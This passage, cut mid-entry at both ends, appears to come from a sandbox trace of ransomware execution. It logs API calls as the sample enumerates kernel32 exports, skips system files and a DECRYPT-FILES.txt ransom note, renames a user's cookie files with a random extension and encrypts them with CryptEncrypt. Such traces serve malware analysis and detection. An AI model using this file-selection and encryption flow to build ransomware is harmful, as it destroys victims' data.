lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.302] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.302] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.302] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.302] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.302] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.302] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.302] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.302] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.302] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.302] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.302] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.303] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.303] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.303] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.303] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.303] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.303] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.303] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.303] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.303] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.303] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.303] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.303] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.303] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.303] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.303] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.303] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.303] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.303] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.303] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.304] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.304] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.304] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.304] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.304] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.304] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.304] lstrlenA (lpString="DELETEATOM") returned 10 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.304] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.304] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.304] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.304] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.304] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.304] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.304] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.304] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.304] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.304] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.305] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.305] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.305] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.305] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.305] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.305] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.305] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.305] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.305] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.305] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.305] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.305] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.305] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.305] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.305] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.305] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.305] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.305] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.305] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.306] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.306] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.306] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.306] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.306] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.306] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.306] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.306] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.306] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.306] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.306] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.306] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.306] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.306] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.306] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt") returned 110 [0079.307] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU") returned 116 [0079.307] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.lFrkU" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.lfrku"), dwFlags=0x0) returned 1 [0079.308] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.308] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.308] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.308] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbdf95770, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbdf95770, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbdf95770, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x82, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@c.msn[1].txt", cAlternateFileName="5PB89C~1.TXT")) returned 1 [0079.308] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.308] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt", lpString2="autorun.inf") returned -1 [0079.308] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt", lpString2="boot.ini") returned -1 [0079.308] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt", lpString2="desktop.ini") returned -1 [0079.309] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt", lpString2="ntuser.dat") returned -1 [0079.309] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt", lpString2="iconcache.db") returned -1 [0079.309] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt", lpString2="bootsect.bak") returned -1 [0079.309] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.309] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt", lpString2="thumbs.db") returned -1 [0079.309] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.msn[1].txt", lpString2="Bootfont.bin") returned -1 [0079.309] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@c.msn[1].txt") returned 33 [0079.309] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.309] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.309] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.309] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.309] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.309] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@c.msn[1].txt") returned 33 [0079.309] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.309] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@c.msn[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt" [0079.309] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.311] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=130) returned 1 [0079.311] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.311] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.312] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.312] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.312] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.313] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.313] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.314] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.314] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.314] CloseHandle (hObject=0x464) returned 1 [0079.314] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.315] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.315] CloseHandle (hObject=0x0) returned 0 [0079.315] CloseHandle (hObject=0x460) returned 1 [0079.316] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.317] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.317] GetTickCount () returned 0x114c524 [0079.317] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.317] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.317] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.317] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.318] lstrlenA (lpString="kernel32.dll") returned 12 [0079.318] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.318] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.318] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.318] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.318] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.318] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.318] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.318] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.318] lstrlenA (lpString="ADDATOMA") returned 8 [0079.318] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.318] lstrlenA (lpString="ADDATOMW") returned 8 [0079.318] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.318] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.318] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.318] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.318] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") 